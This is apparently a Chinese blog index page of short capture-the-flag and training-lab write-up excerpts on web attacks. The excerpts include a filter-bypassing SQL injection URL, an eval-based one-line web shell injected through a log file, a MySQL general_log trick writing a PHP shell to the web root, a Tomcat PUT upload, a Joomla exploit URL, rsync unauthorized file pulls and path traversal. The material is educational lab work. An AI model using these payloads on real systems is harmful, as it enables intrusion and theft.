自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+

多崎巡礼的博客

相与枕藉乎舟中,不知东方之既白

  • 博客(21)
  • 收藏
  • 关注

原创 墨者学院 - SQL过滤字符后手工注入漏洞测试(第1题)

一开始怎么加字符都不行,才发现应该是检测到我注入以后跳转了;(过滤了空格和一些常规查询字符,“+”号也过滤了,大小写不能绕过那就URL编码吧)和以往的套路一样,猜得到字段是4个。。。http://219.153.49.228:44375/new_list.php?id=-1/**/union/**/select/**/1,database(),version(),4url编码构造如...

2018-09-28 16:12:55 2689

原创 webshell原理

(源自摘抄整理)https://www.91ri.org/11494.htmlWebshell实现与隐藏探究一、什么是webshellwebshell简介webshell,顾名思义:web指的是在web服务器上,而shell是用脚本语言编写的脚本程序,webshell就是就是web的一个管理工具,可以对web服务器进行操作的权限,也叫webadmin。webshell一般是被网站管...

2018-09-28 13:08:56 35734

原创 墨者学院 - SQL注入漏洞测试(参数加密)

list.php御剑扫描得到   http://219.153.49.228:48291/news/list.zip解压得到源码从decode方法可知:AES的数据块长度为128位,密钥为ydhaqPQnexoaDuW3,偏移量为2018201920202021,填充为zeropadding第八行 :判断网页id后面的查询字符串值,先两次base64解密,再AES解密,删除_mo...

2018-09-28 11:30:17 2537

原创 Bugku - never give up

查看源码发现访问view-source:http://120.24.86.145:8006/test/1p.html发现了一串url编码 解密后得到<script>window.location.href='http://www.bugku.com';</script> <!--JTIyJTNCaWYlMjglMjElMjRfR0VUJTVCJTI3...

2018-09-26 16:00:27 416

原创 Bugku - 管理员系统

 查看网页源代码在网页源代码中除最后一行注释代码外,没有什么其它值得特别注意的代码dGVzdDEyMw== 很明显是Base64编码格式,解码: test123登录用户名admin密码test123 根据返回提示可以看出 肯定是伪造本地ip才能访问那就伪造试一下抓包加上X-Forwarded-For: 127.0.0.1得到flag X-...

2018-09-26 15:53:52 1412

原创 Bugku - 字符?正则?

这是一道正则匹配题.                                  匹配除 "\n" 之外的任何单个字符*                                 匹配它前面的表达式0次或多次,等价于{0,}{4,7}                           最少匹配 4 次且最多匹配 7 次,结合前面的 . 也就是匹配 4 到 7 个任意字...

2018-09-26 15:33:56 421

原创 墨者学院 - Redis配置错误导致的远程代码漏洞溯源

安装过程https://blog.csdn.net/dalaoadalaoa/article/details/46885171安装只需要一部分,mark一下,毕竟解题的是客户端重启命令 src/redis-server redis.conf 搜的关于重启的答案全tm标的原创的复制粘贴来的low比水货呵呵 此题答案链接在这https://blog.csdn.net/u01...

2018-09-26 15:10:12 816 3

转载 Nmap的使用方法总结

Nmap的使用方法总结 一:各种参数的使用 1:ping扫描 —— nmap < 要扫描的目标ip地址> 2:TCP SYN Ping扫描 3:-PA TCP ACK Ping扫描 4:半开扫描 5:自定义端口扫描 `nmap -P(扫描范围)< 要扫描的目标ip地址>` 6:-Pn 非ping扫描,不执行主机发现,可以跳过防火墙 ( `...

2018-09-26 11:29:30 990 1

原创 Kali升级教程及添加源

一:使用如下命令进入软件源文件vim /etc/apt/sources.list 二:将默认的源文件替换(下面介绍替换的具体操作,熟悉Linux操作指令的同学可以跳过)输入 i 进入编辑模式(编辑的就是刚打开的sources.list文件) 将旧的源文件删掉或者注释掉(里面除了原来的更新源都是注释,不用怕删掉不该删的) 将新的更新源复制粘贴到该文件中,注意Linux终端下...

2018-09-26 11:27:23 3014

原创 墨者学院 - rsync未授权访问漏洞利用

关于rsync语句解释链接如下http://man.linuxde.net/rsync root@kali:~# rsync -v rsync://iproot@kali:~# rsync -v rsync://ip/volumeroot@kali:~# rsync -avz rsync://ip/volume/key_xxx.php /root done ...

2018-09-26 11:21:47 2123

原创 墨者学院 - PHP本地包含漏洞代码溯源

 根据r.php源码构造本地文件读取url:/r.php?p=../../../../../../../the_key_is_heredone

2018-09-25 14:50:21 742

原创 根据网站错误页面判断服务器和系统服务

在网址后面加 /1 显示下图这样的,是JSP站,apache,linux服务器 jsp站 8080、81端口一般都是开的,可以在网址后面加上8080,81这样来测试     显示下图这样的,白底黑字的就是是2003系统,iis6.0,  这个就很好认了,也很常见     下图这样的,白底黑字加红字的是 window 2008 R2  IIS7.5(IIS7.0也...

2018-09-20 09:29:30 834 2

原创 墨者学院 - 密码学加解密实训(Zip伪加密)

zip格式文件伪加密实践是检验真理的唯一标准简介zip文件是一种压缩文件,可进行加密,也可不加密。而伪加密是在未加密的zip文件基础上修改了它的压缩源文件目录区里的全局方式位标记的比特值,使得压缩软件打开它的时候识别为加密文件,提示输入密码, 而在这个时候,不管你用什么软件对其进行密码破解,都无法打开它!这就是它存在的意义!zip官方文档zip中文详解文件组成压缩源...

2018-09-18 15:34:21 1706 1

原创 墨者学院 - Tomcat 远程代码执行漏洞利用(第1题)

刷新fit网站 burp截包,repeater,更改不安全的HTTP方法为PUT(将get更改为options可查看服务器支持哪些)PUT /自定义文件名/ HTTP/1.1eg:   PUT /9.jsp/ HTTP/1.1     (jsp后无空格,反之会报错)添加以下代码<%@ page language="java" import="java.util.*,ja...

2018-09-17 17:22:23 1307

原创 墨者学院 - Apache Struts2远程代码执行漏洞(S2-005)复现

K8大佬神器一出done

2018-09-17 15:29:16 2088 1

转载 墨者学院 - SQL语句利用日志写shell

outfile被禁止,或者写入文件被拦截在数据库中操作如下:(必须是root权限)1.show variables like ‘%general%'; #查看配置2.set global general_log = on; #开启general log模式3.set global general_log_file = ‘/var/www/html/1.php'; #设置日志目录为s...

2018-09-07 18:04:59 232

原创 教师资格证报名-ie浏览器-不兼容

不会用电脑的人类都是大猪蹄子!!!要是有360浏览器,自行必应怎么开启兼容性,拒绝教,垃圾360,,,要是是win10/8.1/7,继续看,,,方法一:键盘按windows那个标志(按完不用管它显示什么),直接输入ie方法二:点小娜,输入ie这就是进入ie浏览器(别管为什么主页是这只鸟。。。重点是必应很好用!百度垃圾百度垃圾百度垃圾)Alt+x+b三个一起按...

2018-09-06 09:40:06 6793 2

原创 墨者学院 - SQL注入实战(防注入)-Access

使用御剑扫描,发现sqlin.asp文件,打开发现是乱码必应一下access通用防注入系统也可以知道注入信息会被记录到sqlin.asp中,这相当于一个文件上传漏洞,可以直接在sqlin.asp中写入一句话在url后面添加一句话代码and 1=<%eval request("chopper")%>,在回显的信息中发现被记录的注入信息只有and 1=,后面的一句话被过滤了...

2018-09-04 15:26:59 1541

原创 墨者学院 - Joomla插件漏洞分析溯源

必应一下(拒绝垃圾百度)构造语句ip/index.php?option=com_collector&view=filelist&tmpl=component&folder=&type=1在image上传一句话木马,菜刀连接done​...

2018-09-04 15:02:38 1065

原创 bugku - login1(SKCTF)

关于sql的约束攻击资料可参考https://blog.csdn.net/qq_42357070/article/details/82379183本题可利用注册账户“admin                                       1”(admin后面空格超过预设的“n”个字符/varchar(n))即可密码自定义数据库实际写入的是admin/密码登陆即可...

2018-09-04 10:31:03 1529

转载 基于约束的SQL攻击

前言值得庆幸的是如今开发者在构建网站时,已经开始注重安全问题了。绝大部分开发者都意识到SQL注入漏洞的存在,在本文我想与读者共同去探讨另一种与SQL数据库相关的漏洞,其危害与SQL注入不相上下,但却不太常见。接下来,我将为读者详细展示这种攻击手法,以及相应的防御策略。注意:本文不是讲述SQL注入攻击背景介绍最近,我遇到了一个有趣的代码片段,开发者尝试各种方法来确保数据库的安全访...

2018-09-04 10:14:44 701

空空如也

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除